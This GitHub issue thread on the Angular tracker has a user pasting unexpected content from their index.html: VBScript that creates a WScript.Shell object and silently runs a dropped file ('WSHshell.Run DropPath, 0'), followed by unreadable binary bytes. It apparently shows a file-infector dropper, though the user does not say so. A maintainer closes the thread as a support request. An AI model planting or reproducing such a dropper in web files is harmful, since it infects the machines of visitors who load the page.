### ISSUE TITLE
Template parse errors: Unexpected closing tag "script" (" Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //-->   

### ISSUE THREAD

**Issue by rahullsinha** [angular/angular#13734]
i got this in index.html after npm start

<SCRIPT Language=VBScript></SCRIPT><!--J��	�F�Lr�dw���<�YG�=ۇ��,�֧Yo1�<�B	��Кn�L�l��o�y�^[N
}P��ʁ�����8)��N���D������|�6�WM	z5��f�4ky�M|e��_'��d��^�O�ڬ���;��MI
7z�\�.|�,�Ec�>�M��
�Kaq4'�jD}��bMe��x��p���`X���龮�EyG&
35�#}ۖc���mvJ}an����dw�x���ZFx�1�K�7�V'����"fy�0��z�ΓV�M*H[�����d�9�0��qyE��*Ɠf-�𮣑�ԟj]���|�o�;���x�a��.p�|��|�S5��4x������l��z�t�����8
���Ǵ��	!βj�&������A����k�S�p�:
���=�-�����t$��3f`�Ϛ}g�J]$j1�@{�Ns�YC�Pl��A���M4�@�����
��

**Comment by ericmartinezr** [comment]
Hello, we reviewed this issue and determined that it doesn't fall into the bug report or feature request category. This issue tracker is not suitable for support requests, please repost your issue on [StackOverflow](http://stackoverflow.com/) using tag `angular`.

If you are wondering why we don't resolve support issues via the issue tracker, please [check out this explanation](https://github.com/angular/angular/blob/master/CONTRIBUTING.md#-got-a-question-or-problem).
